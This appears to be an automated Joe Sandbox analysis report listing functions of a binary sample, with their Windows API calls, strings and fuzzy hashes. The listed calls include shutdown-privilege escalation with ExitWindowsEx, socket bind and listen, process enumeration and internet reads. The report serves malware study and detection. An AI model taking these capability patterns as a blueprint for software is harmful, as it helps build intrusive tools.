Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3cA$_A
API String ID: 674341424-3480954128
Opcode ID: c8ecb1014fa8dcfad6e9c2986c3e2813fc9b0cf9ebf1d5bf7650c4e30b322340
Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
Opcode Fuzzy Hash: c8ecb1014fa8dcfad6e9c2986c3e2813fc9b0cf9ebf1d5bf7650c4e30b322340
Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B

Function 00415760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004158A5
_memmove.LIBCMT ref: 004158F5
_memmove.LIBCMT ref: 0041595B

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: ef6eefa2f9032fef0d16e177236bcb3558174e7ce64840fb1b9b175fab15d2a1
Instruction ID: fe3fa380dd79410c0d4e58696af30f423fcd40af0ea7aa6f8d28fb308e13f721
Opcode Fuzzy Hash: ef6eefa2f9032fef0d16e177236bcb3558174e7ce64840fb1b9b175fab15d2a1
Instruction Fuzzy Hash: 9D12AC70A00609DFCF04DFA5D981AEEB3F5FF88304F10452AE846A7291EB39AD55CB59

Function 004651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865

ExitWindowsEx.USER32(?,00000000), ref: 004651F9

Strings

, xrefs: 004651E7
SeShutdownPrivilege, xrefs: 004651C9
@, xrefs: 004651EC

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F

Function 00476283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
WSAGetLastError.WSOCK32(00000000), ref: 004762EB
bind.WSOCK32(00000000,?,00000010), ref: 00476307
listen.WSOCK32(00000000,00000005), ref: 00476316
WSAGetLastError.WSOCK32(00000000), ref: 00476330
closesocket.WSOCK32(00000000,00000000), ref: 00476344

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59

Function 00415520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

_memmove.LIBCMT ref: 00450258
_memmove.LIBCMT ref: 0045036D
_memmove.LIBCMT ref: 00450414

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 0b69588945e0b9e04a1e8208d8dd6483ea26d008b6fb0c96b79dce7983f255cc
Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
Opcode Fuzzy Hash: 0b69588945e0b9e04a1e8208d8dd6483ea26d008b6fb0c96b79dce7983f255cc
Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99

Function 00401287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
GetSysColor.USER32(0000000F), ref: 00401A4E
SetBkColor.GDI32(?,00000000), ref: 00401A61

Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE

Function 00476747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
WSAGetLastError.WSOCK32(00000000), ref: 004767C7
bind.WSOCK32(00000000,?,00000010), ref: 00476800
WSAGetLastError.WSOCK32(00000000), ref: 0047680D
closesocket.WSOCK32(00000000,00000000), ref: 00476821

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
Opcode Fuzzy Hash: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799

Function 00485376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 004853C5
IsWindowEnabled.USER32 ref: 004853D3
GetForegroundWindow.USER32(?,?,00000001), ref: 004853E0
IsIconic.USER32 ref: 004853EE
IsZoomed.USER32 ref: 004853FC

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD

Function 004580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64

Function 0046C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0046C432
CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

CoUninitialize.OLE32 ref: 0046C6B7

Strings

.lnk, xrefs: 0046C3C6, 0046C3EE, 0046C3F8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 8be31365239305a4f0ecbc96338834b64287ccbcc385a5ffb8382792e3c7b4fb
Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
Opcode Fuzzy Hash: 8be31365239305a4f0ecbc96338834b64287ccbcc385a5ffb8382792e3c7b4fb
Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56

Function 00404B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57

Strings

GetNativeSystemInfo, xrefs: 00404B51
kernel32.dll, xrefs: 00404B40

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C

Function 0047EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 8474e8f7e6d518a839c74cc5eb54a158aeec258ffafa63196fda6ec9f60604bc
Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
Opcode Fuzzy Hash: 8474e8f7e6d518a839c74cc5eb54a158aeec258ffafa63196fda6ec9f60604bc
Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96

Function 0045E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628

Strings

(, xrefs: 0045E66E
|, xrefs: 0045E658

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 9168c4c44934064b777b19449f8ddf58753b33bee85af42b019ce53e691585fc
Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
Opcode Fuzzy Hash: 9168c4c44934064b777b19449f8ddf58753b33bee85af42b019ce53e691585fc
Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44

Function 004722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 521e8ed97bf12570bed30d1cea6a3edf724572c9ec4fdcea442398a5e3207fd9
Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
Opcode Fuzzy Hash: 521e8ed97bf12570bed30d1cea6a3edf724572c9ec4fdcea442398a5e3207fd9
Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658

Function 0046B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046B343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55

Function 004587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
GetLastError.KERNEL32 ref: 00458865

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: e40a1783a4a31f9ec7d594cc04a7385dd35e7a4d1765caa27eb251e992861782
Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
Opcode Fuzzy Hash: e40a1783a4a31f9ec7d594cc04a7385dd35e7a4d1765caa27eb251e992861782
Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64

Function 0045874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
FreeSid.ADVAPI32(?), ref: 0045879B

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
